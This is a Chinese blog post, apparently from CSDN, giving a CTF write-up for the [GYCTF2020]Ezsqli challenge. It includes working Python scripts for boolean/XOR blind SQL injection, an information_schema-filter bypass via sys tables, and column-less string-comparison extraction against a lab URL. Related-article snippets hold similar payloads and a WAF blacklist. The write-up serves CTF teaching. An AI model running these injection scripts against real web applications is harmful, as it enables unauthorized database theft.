[GYCTF2020]Ezsqli

最新推荐文章于 2025-01-19 14:22:37 发布
最新推荐文章于 2025-01-19 14:22:37 发布
阅读量980 收藏
点赞数
分类专栏: 安全 CTF sql注入 文章标签: sql 数据库 database 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mrs_H/article/details/121037104
版权
本文详细介绍了SQL注入中遇到的ASCII位偏移技术,以及如何通过位偏移来获取数据库信息。作者通过两个不同的payload展示了如何绕过information_schema过滤,并利用二分法进行字符猜解,最终成功获取到隐藏的flag。文章还提到了在实际操作中遇到的二分查找脚本问题,并分享了解决方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

前几天一直在忙课程的作业,话说实验课的实验是越来越多了。一直没有抽出时间来做sql注入的题目。这次又做了一道题目,这道题目可以说是让我又长知识了。ascii的位偏移属于是没听说过(x

正文

首先这道题的前端很简单,就是一张网页上贴了一张画以及加了个搜索框。
请添加图片描述
通过尝试,我们发现,下面这个搜索框可以通过我们输入数字的不同而产生不同回显。但是经过sql字典的fuzz发现他过滤了in也就是说这道题的第一个考点在于information_schema过滤。我们直接用sys.x$schema_flattened_keys来进行绕过。
让我们看一下改变post的数据究竟会让服务器端的响应发生什么变化。
请添加图片描述
请添加图片描述
我们发现当payload后面的表达式为真的时候,就会返回Nu1L否则就会返回V&N,基于此我们编写exp如下:

import requests
import time

def start_ascii():
    result = ""
    url = "http://9640761b-a0fc-457b-bf37-592af5e65e5c.node4.buuoj.cn:81/index.php"
    for i in range(1,300):
        low = 32
        high = 128
        mid = (low + high)//2
        while(low < high):
            # payload = "2||ascii(substr((select(database())),{},1))>{}".format(i, mid)
            # payload = "2||ascii(substr((select(group_concat(table_name))from(sys.x$schema_flattened_keys)where((table_schema)=(database()))),{},1))>{}".format(i, mid)
            data = {"id": payload}
            print(payload)
            res = requests.post(url, data=data)
            if 'Nu1L' in res.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high)//2
            # 跳出循环
        if mid == 32 or mid == 127:
            break
        result = result + chr(mid)
        print(result)

if __name__ == "__main__":
    start_ascii()

利用上面这个脚本的两个payload我们可以得到,这道题的数据库,以及表名。
请添加图片描述
请添加图片描述
上述payload不是唯一的形式,我在之前的一个文章中提到一个问题就是如果一道sql注入的题目它可以接受数字1,那么他就会存在异或盲注的问题。
所以我们的payload还可以写成^(ascii(substr((select(database())),%d,1))>%d)^1的形式。可以达到同样的效果。
接下来就是这道题的重头戏了,无列名注入的另一种方式(不需要union,join)ascii位偏移。
在这里直接贴上一个exp吧

import requests

url='http://9640761b-a0fc-457b-bf37-592af5e65e5c.node4.buuoj.cn:81/index.php'
payload='2||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'
flag=''
for j in range(200):
    for i in range(32,128):
        hexchar=flag+chr(i)
        py=payload.format(hexchar)
        datas={'id':py}
        re=requests.post(url=url,data=datas)
        if 'Nu1L' in re.text:
            flag+=chr(i-1)
            print(flag)
            break

上面这个exp是市面上普遍在用的脚本。
其中的(select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh)是在进行字符串比较,从第一个字符开始比较,依次比较完字符串中的所有字符。只要在这中间有一个字符出现不相等的情况,则会返回比较结果。为了保持列数的相同,这里的select 1是必要的。
其中最后倒数第三行的i-1很多博主对此的解释是,因为这是顺序遍历所以需要减一以回到两个比较值相等的状态。
下面是我的exp

import requests
import time

def start_ascii():
    result = ""
    url = "http://9640761b-a0fc-457b-bf37-592af5e65e5c.node4.buuoj.cn:81/index.php"
    for i in range(1,300):
        low = 32
        high = 128
        mid = (low + high)//2
        while(low < high):
            let = result + chr(mid)
            payload = '2||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(let)
            data = {"id": payload}
            print(payload)
            res = requests.post(url, data=data)
            if 'Nu1L' in res.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high)//2
            # 跳出循环
        if mid == 32 or mid == 127:
            break
        result = result + chr(mid-1)
        print(result)

if __name__ == "__main__":
    start_ascii()

我这里用的是二分法,与上面的exp相同也要减一
最终的flag如下请添加图片描述
需要转换成小写(上交flag的时候需要转换成小写。

后记

这道题总体来说是不难的,虽然仍存在着一个新奇的考点,也学到了ascii的位偏移。但是这道题真正让我产生疑惑的却是我之前一直用的二分查找脚本失效的问题。是真的困扰了我很久,因为一直以来这个脚本的工作质量都还可以,直到遇到了这道题。后来发现是二分查找判断语句中的大于号写反了(我是废物)。

[GYCTF2020] web题-Ezsqli
BROTHERYY的博客
12-30 522
这题一直出问题,用脚本跑到一半都会崩。 后面换了一个,能够跑出来。 详细情况可以看看Ying师傅的blog https://www.gem-love.com/ctf/1782.html 我把跑出来的代码贴出来可以参考下 # coding:utf-8 import requests import time url = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==>
[GYCTF2020] Ezsqli
qq_40327508的博客
11-21 547
考点: 盲注 + 无列名注入 使用异或注入发现页面回显不一样 进一步判断 接下来开始获取列名,但是因为or被过滤使用sys.x$schema_flattened_keys绕过 使用脚本获取表名 import requests url = "http://9c35ab79-5056-4de1-87fe-0418ebc00b82.node3.buuoj.cn/index.php" flag = "" payload = "1^(ascii(substr((select group_concat(tab
2025.1.18——七、[GYCTF2020]Ezsqli 1
2402_87387800的博客
01-19 1294
题目来源:buuctf[GYCTF2020]Ezsqli1。
[GYCTF2020]Ezsqli ---不会编程的崽
不会编程的崽的博客
03-22 567
既然知道是sql注入就不墨迹了。初步判断盲注,判断盲注的方发不用说了吧,然后fuzz一下,information被过滤了。再次可以判断为盲注与无列名注入。因为无列名注入无法获得列名,不能使用普通盲注,而且这里也无法使用union select。来尝试一下新的方法吧。管他有列名还是无列名,先找到表。由于information被过滤了。这是比较形象的解释。所以构造payload。这题不难,难的是不知道有哪些表可以利用,不知道这种比较方法。又是sql新题型哦。最后在转化为小写就可以提交了。脚本写的不好,请见谅。
xctf攻防世界easysql wp
sash1mi
02-20 2030
xctf攻防世界easysql wp 考察知识点: SQL注入 二次注入 python脚本 访问题目地址 有注册和登录两个功能 经测试发现该题目存在二次注入 https://www.jianshu.com/p/3fe7904683ac username:'k3vin"/ password:k3vin email:k3vin 注册成功后有一个修改密码的页面 修改密码,报如下错误 猜测并构造payload: 1"||extractvalue(1,concat(0x7e,(select(database
buuctf-[GYCTF2020]Ezsqli(异或注入无列名)
m0_62094846的博客
05-18 736
尝试过后发现只有1,2可以,3以上会显示错误 尝试一下slq注入,但是输入不是1,2的就会显示错误 尝试异或注入 被过滤了 过滤了for,in在information里也被过滤了 可以用这种方式获得当前数据库,但是information不能用了,也没什么绕过的方式,就不能查表之类的了 id=1^(ascii(substr(database(),1,1))=103)^1 换成 innodb_table_stats 也没用 聊一聊bypass in...
buu-[GYCTF2020]Ezsqli
qaq517384的博客
10-10 434
朴实无华一张图片,一个输入框,图片太大就不放了 1是Nu1L,2是V&N,剩下都是“Error Occured When Fetch Result.” fuzz一下,507的都是被过滤了的 过滤了关键的information, 要用到无列名注入,找库名时需要用到用到5.7版本新增的sys库 利用sys库里的三个表都行 schema_table_statistics/schema_table_statistics_with_buffer /x$schema_flattened_keys 表可以找到
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无列明注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1599
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
[GYCTF2020]Blacklist
最新发布
01-21
### GYCTF2020 Blacklist 题目解析 #### Web 应用防火墙(WAF)分析 WAF配置显示,`calc.php`文件中的过滤机制非常严格。具体来说,该PHP脚本会检测并阻止任何包含特定字符的输入请求,这些被屏蔽的字符包括但不限于空格、制表符、回车符、换行符以及常见的SQL注入元字符如单引号(`'`)、双引号(`"`)[^1]。 ```php $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]', '$','\\','^']; foreach ($blacklist as $blackitem) { if (preg_match('/' . $blackitem . '/m', $str)) { die("what are you want to do?"); } } ``` 此段代码表明服务器端对于用户提交的数据进行了严格的预处理,旨在防止恶意攻击者利用特殊字符绕过安全防护措施执行非法操作。 #### SQL 注入尝试方法 尽管存在上述黑名单过滤策略,在实际渗透测试过程中仍然可以采用一些技巧来规避这种防御手段。例如,通过模糊测试(SQL Fuzzing),即向目标应用发送一系列构造好的查询字符串以观察其响应行为模式变化;这种方法有助于识别潜在的安全漏洞所在之处[^2]。 当遇到较为复杂的过滤条件时,则可能需要借助自动化工具编写自定义脚本来持续不断地试探不同类型的payload组合直至找到有效的突破点。 #### 绕过技术探讨 针对此类情况的一种常见解决方案是使用编码转换或者寻找替代表达方式实现相同功能而不触发报警机制。比如: - 利用手动URL编码或其他形式转义避开直接匹配; - 尝试替换某些敏感关键字为同义词或近似结构; - 构建多层嵌套逻辑混淆语法特征减少单一特征命中率。 最终目的是构建能够成功传递给后端解释器但仍保持原有意图的有效载荷(Payload)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值